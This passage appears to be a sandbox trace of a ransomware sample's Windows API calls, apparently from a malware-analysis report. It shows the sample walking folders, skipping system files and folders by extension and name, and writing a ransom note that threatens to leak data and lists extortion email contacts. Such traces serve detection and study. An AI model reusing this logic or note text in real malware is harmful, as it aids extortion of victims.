0xeb0550 [0137.596] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2cb8 | out: hHeap=0xea0000) returned 1 [0137.596] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2a50 | out: hHeap=0xea0000) returned 1 [0137.596] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd38 [0137.596] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebba0 [0137.596] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0137.596] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f55643f, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x5f55643f, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x23ff2d20, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xce00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hmmapi.dll", cAlternateFileName="")) returned 1 [0137.596] lstrcmpW (lpString1="hmmapi.dll", lpString2=".") returned 1 [0137.596] lstrcmpW (lpString1="hmmapi.dll", lpString2="..") returned 1 [0137.596] StrStrIW (lpFirst="hmmapi.dll", lpSrch=".UAKXC") returned 0x0 [0137.596] StrStrIW (lpFirst="hmmapi.dll", lpSrch=".exe") returned 0x0 [0137.596] StrStrIW (lpFirst="hmmapi.dll", lpSrch=".dll") returned=".dll" [0137.596] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9a30bbb, ftCreationTime.dwHighDateTime=0x1c9ea0a, ftLastAccessTime.dwLowDateTime=0xb9a30bbb, ftLastAccessTime.dwHighDateTime=0x1c9ea0a, ftLastWriteTime.dwLowDateTime=0xb9a30bbb, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xa59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ie8props.propdesc", cAlternateFileName="")) returned 1 [0137.596] lstrcmpW (lpString1="ie8props.propdesc", lpString2=".") returned 1 [0137.596] lstrcmpW (lpString1="ie8props.propdesc", lpString2="..") returned 1 [0137.596] StrStrIW (lpFirst="ie8props.propdesc", lpSrch=".UAKXC") returned 0x0 [0137.596] StrStrIW (lpFirst="ie8props.propdesc", lpSrch=".exe") returned 0x0 [0137.596] StrStrIW (lpFirst="ie8props.propdesc", lpSrch=".dll") returned 0x0 [0137.596] StrStrIW (lpFirst="ie8props.propdesc", lpSrch=".lnk") returned 0x0 [0137.596] StrStrIW (lpFirst="ie8props.propdesc", lpSrch=".sys") returned 0x0 [0137.596] StrStrIW (lpFirst="ie8props.propdesc", lpSrch=".msi") returned 0x0 [0137.596] StrStrIW (lpFirst="ie8props.propdesc", lpSrch="R3ADM3.txt") returned 0x0 [0137.596] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0137.596] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0137.596] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2cb8 [0137.596] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0137.596] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2cb8 | out: hHeap=0xea0000) returned 1 [0137.596] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2a50 | out: hHeap=0xea0000) returned 1 [0137.596] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0137.596] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xedab30 [0137.597] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeece00 [0137.597] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee398 [0137.597] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0137.597] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0137.597] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa37b6f98, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa37b6f98, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa37b6f98, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iecompat.dll", cAlternateFileName="")) returned 1 [0137.597] lstrcmpW (lpString1="iecompat.dll", lpString2=".") returned 1 [0137.597] lstrcmpW (lpString1="iecompat.dll", lpString2="..") returned 1 [0137.597] StrStrIW (lpFirst="iecompat.dll", lpSrch=".UAKXC") returned 0x0 [0137.597] StrStrIW (lpFirst="iecompat.dll", lpSrch=".exe") returned 0x0 [0137.597] StrStrIW (lpFirst="iecompat.dll", lpSrch=".dll") returned=".dll" [0137.597] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa37b6f98, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa37b6f98, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa37dd0f9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xf7600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iedvtool.dll", cAlternateFileName="")) returned 1 [0137.597] lstrcmpW (lpString1="iedvtool.dll", lpString2=".") returned 1 [0137.597] lstrcmpW (lpString1="iedvtool.dll", lpString2="..") returned 1 [0137.597] StrStrIW (lpFirst="iedvtool.dll", lpSrch=".UAKXC") returned 0x0 [0137.597] StrStrIW (lpFirst="iedvtool.dll", lpSrch=".exe") returned 0x0 [0137.597] StrStrIW (lpFirst="iedvtool.dll", lpSrch=".dll") returned=".dll" [0137.597] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa357baf4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa357baf4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa357baf4, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x41e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ieinstal.exe", cAlternateFileName="")) returned 1 [0137.597] lstrcmpW (lpString1="ieinstal.exe", lpString2=".") returned 1 [0137.597] lstrcmpW (lpString1="ieinstal.exe", lpString2="..") returned 1 [0137.597] StrStrIW (lpFirst="ieinstal.exe", lpSrch=".UAKXC") returned 0x0 [0137.597] StrStrIW (lpFirst="ieinstal.exe", lpSrch=".exe") returned=".exe" [0137.597] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdecd4578, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xdecd4578, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xe3cb04e0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x1c400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ielowutil.exe", cAlternateFileName="")) returned 1 [0137.597] lstrcmpW (lpString1="ielowutil.exe", lpString2=".") returned 1 [0137.597] lstrcmpW (lpString1="ielowutil.exe", lpString2="..") returned 1 [0137.597] StrStrIW (lpFirst="ielowutil.exe", lpSrch=".UAKXC") returned 0x0 [0137.597] StrStrIW (lpFirst="ielowutil.exe", lpSrch=".exe") returned=".exe" [0137.597] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3803259, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa3803259, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa3803259, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6e200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ieproxy.dll", cAlternateFileName="")) returned 1 [0137.597] lstrcmpW (lpString1="ieproxy.dll", lpString2=".") returned 1 [0137.597] lstrcmpW (lpString1="ieproxy.dll", lpString2="..") returned 1 [0137.597] StrStrIW (lpFirst="ieproxy.dll", lpSrch=".UAKXC") returned 0x0 [0137.598] StrStrIW (lpFirst="ieproxy.dll", lpSrch=".exe") returned 0x0 [0137.598] StrStrIW (lpFirst="ieproxy.dll", lpSrch=".dll") returned=".dll" [0137.598] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa357baf4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa357baf4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa357baf4, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x47a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IEShims.dll", cAlternateFileName="")) returned 1 [0137.598] lstrcmpW (lpString1="IEShims.dll", lpString2=".") returned 1 [0137.598] lstrcmpW (lpString1="IEShims.dll", lpString2="..") returned 1 [0137.598] StrStrIW (lpFirst="IEShims.dll", lpSrch=".UAKXC") returned 0x0 [0137.598] StrStrIW (lpFirst="IEShims.dll", lpSrch=".exe") returned 0x0 [0137.598] StrStrIW (lpFirst="IEShims.dll", lpSrch=".dll") returned=".dll" [0137.598] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa387567a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa387567a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa387567a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa9b10, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iexplore.exe", cAlternateFileName="")) returned 1 [0137.598] lstrcmpW (lpString1="iexplore.exe", lpString2=".") returned 1 [0137.598] lstrcmpW (lpString1="iexplore.exe", lpString2="..") returned 1 [0137.598] StrStrIW (lpFirst="iexplore.exe", lpSrch=".UAKXC") returned 0x0 [0137.598] StrStrIW (lpFirst="iexplore.exe", lpSrch=".exe") returned=".exe" [0137.598] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3686496, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa3686496, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa36ac5f7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x7b600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jsdbgui.dll", cAlternateFileName="")) returned 1 [0137.598] lstrcmpW (lpString1="jsdbgui.dll", lpString2=".") returned 1 [0137.598] lstrcmpW (lpString1="jsdbgui.dll", lpString2="..") returned 1 [0137.598] StrStrIW (lpFirst="jsdbgui.dll", lpSrch=".UAKXC") returned 0x0 [0137.598] StrStrIW (lpFirst="jsdbgui.dll", lpSrch=".exe") returned 0x0 [0137.598] StrStrIW (lpFirst="jsdbgui.dll", lpSrch=".dll") returned=".dll" [0137.598] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe54abd0a, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xe54abd0a, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x2b495380, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x23600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jsdebuggeride.dll", cAlternateFileName="")) returned 1 [0137.598] lstrcmpW (lpString1="jsdebuggeride.dll", lpString2=".") returned 1 [0137.598] lstrcmpW (lpString1="jsdebuggeride.dll", lpString2="..") returned 1 [0137.598] StrStrIW (lpFirst="jsdebuggeride.dll", lpSrch=".UAKXC") returned 0x0 [0137.598] StrStrIW (lpFirst="jsdebuggeride.dll", lpSrch=".exe") returned 0x0 [0137.598] StrStrIW (lpFirst="jsdebuggeride.dll", lpSrch=".dll") returned=".dll" [0137.598] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41a0e8a, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xe41a0e8a, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x2b4b9d70, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x20400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JSProfilerCore.dll", cAlternateFileName="")) returned 1 [0137.598] lstrcmpW (lpString1="JSProfilerCore.dll", lpString2=".") returned 1 [0137.598] lstrcmpW (lpString1="JSProfilerCore.dll", lpString2="..") returned 1 [0137.598] StrStrIW (lpFirst="JSProfilerCore.dll", lpSrch=".UAKXC") returned 0x0 [0137.598] StrStrIW (lpFirst="JSProfilerCore.dll", lpSrch=".exe") returned 0x0 [0137.599] StrStrIW (lpFirst="JSProfilerCore.dll", lpSrch=".dll") returned=".dll" [0137.599] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa36ac5f7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa36ac5f7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa36ac5f7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x46400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jsprofilerui.dll", cAlternateFileName="")) returned 1 [0137.599] lstrcmpW (lpString1="jsprofilerui.dll", lpString2=".") returned 1 [0137.599] lstrcmpW (lpString1="jsprofilerui.dll", lpString2="..") returned 1 [0137.599] StrStrIW (lpFirst="jsprofilerui.dll", lpSrch=".UAKXC") returned 0x0 [0137.599] StrStrIW (lpFirst="jsprofilerui.dll", lpSrch=".exe") returned 0x0 [0137.599] StrStrIW (lpFirst="jsprofilerui.dll", lpSrch=".dll") returned=".dll" [0137.599] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x825d0f8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0x825d0f8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0x5909b005, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x579f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msdbg2.dll", cAlternateFileName="")) returned 1 [0137.599] lstrcmpW (lpString1="msdbg2.dll", lpString2=".") returned 1 [0137.599] lstrcmpW (lpString1="msdbg2.dll", lpString2="..") returned 1 [0137.599] StrStrIW (lpFirst="msdbg2.dll", lpSrch=".UAKXC") returned 0x0 [0137.599] StrStrIW (lpFirst="msdbg2.dll", lpSrch=".exe") returned 0x0 [0137.599] StrStrIW (lpFirst="msdbg2.dll", lpSrch=".dll") returned=".dll" [0137.599] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x594eb7ab, ftCreationTime.dwHighDateTime=0x1c9ea0a, ftLastAccessTime.dwLowDateTime=0x594eb7ab, ftLastAccessTime.dwHighDateTime=0x1c9ea0a, ftLastWriteTime.dwLowDateTime=0x439e9300, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x83200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pdm.dll", cAlternateFileName="")) returned 1 [0137.599] lstrcmpW (lpString1="pdm.dll", lpString2=".") returned 1 [0137.599] lstrcmpW (lpString1="pdm.dll", lpString2="..") returned 1 [0137.599] StrStrIW (lpFirst="pdm.dll", lpSrch=".UAKXC") returned 0x0 [0137.599] StrStrIW (lpFirst="pdm.dll", lpSrch=".exe") returned 0x0 [0137.599] StrStrIW (lpFirst="pdm.dll", lpSrch=".dll") returned=".dll" [0137.599] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57ba0f30, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x57ba0f30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57ba0f30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0137.599] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0137.599] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0137.599] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0137.599] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0137.599] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0137.599] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0137.599] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0137.599] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0137.599] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0137.599] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x98d1a336, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98d1a336, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SIGNUP", cAlternateFileName="")) returned 1 [0137.599] lstrcmpW (lpString1="SIGNUP", lpString2=".") returned 1 [0137.599] lstrcmpW (lpString1="SIGNUP", lpString2="..") returned 1 [0137.599] StrStrIW (lpFirst="SIGNUP", lpSrch="tmp") returned 0x0 [0137.600] StrStrIW (lpFirst="SIGNUP", lpSrch="winnt") returned 0x0 [0137.600] StrStrIW (lpFirst="SIGNUP", lpSrch="temp") returned 0x0 [0137.600] StrStrIW (lpFirst="SIGNUP", lpSrch="thumb") returned 0x0 [0137.600] StrStrIW (lpFirst="SIGNUP", lpSrch="$Recycle.Bin") returned 0x0 [0137.600] StrStrIW (lpFirst="SIGNUP", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.600] StrStrIW (lpFirst="SIGNUP", lpSrch="System Volume Information") returned 0x0 [0137.600] StrStrIW (lpFirst="SIGNUP", lpSrch="Boot") returned 0x0 [0137.600] StrStrIW (lpFirst="SIGNUP", lpSrch="Windows") returned 0x0 [0137.600] StrStrIW (lpFirst="SIGNUP", lpSrch="Trend Micro") returned 0x0 [0137.600] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0137.600] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2cb8 [0137.600] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0137.600] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2cb8 | out: hHeap=0xea0000) returned 1 [0137.600] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2a50 | out: hHeap=0xea0000) returned 1 [0137.600] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecdd8 [0137.600] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc08 [0137.600] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0137.600] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x855fc7e1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x855fc7e1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85622942, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3bc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0137.600] lstrcmpW (lpString1="sqmapi.dll", lpString2=".") returned 1 [0137.600] lstrcmpW (lpString1="sqmapi.dll", lpString2="..") returned 1 [0137.600] StrStrIW (lpFirst="sqmapi.dll", lpSrch=".UAKXC") returned 0x0 [0137.600] StrStrIW (lpFirst="sqmapi.dll", lpSrch=".exe") returned 0x0 [0137.600] StrStrIW (lpFirst="sqmapi.dll", lpSrch=".dll") returned=".dll" [0137.600] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x855fc7e1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x855fc7e1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85622942, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3bc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 0 [0137.600] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3028 | out: hHeap=0xea0000) returned 1 [0137.600] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2dd8 | out: hHeap=0xea0000) returned 1 [0137.600] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0137.600] Sleep (dwMilliseconds=0x32) [0137.655] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2dc0 | out: hHeap=0xea0000) returned 1 [0137.655] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec31e0 | out: hHeap=0xea0000) returned 1 [0137.655] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0137.655] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0137.655] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0137.655] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0137.655] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0137.655] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2dd8 [0137.655] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebda8 [0137.655] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe10 [0137.656] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xedab30 [0137.656] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe10 | out: hHeap=0xea0000) returned 1 [0137.656] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebda8 | out: hHeap=0xea0000) returned 1 [0137.656] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2dd8 | out: hHeap=0xea0000) returned 1 [0137.656] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\R3ADM3.txt" (normalized: "c:\\program files\\microsoft analysis services\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0137.657] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0137.657] WriteFile (in: hFile=0x6c4, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0137.658] CloseHandle (hObject=0x6c4) returned 1 [0137.658] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0137.658] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0137.658] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x57c394b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57c394b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0137.658] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0137.658] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x57c394b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57c394b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0137.659] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0137.659] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0137.659] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 1 [0137.659] lstrcmpW (lpString1="AS OLEDB", lpString2=".") returned 1 [0137.659] lstrcmpW (lpString1="AS OLEDB", 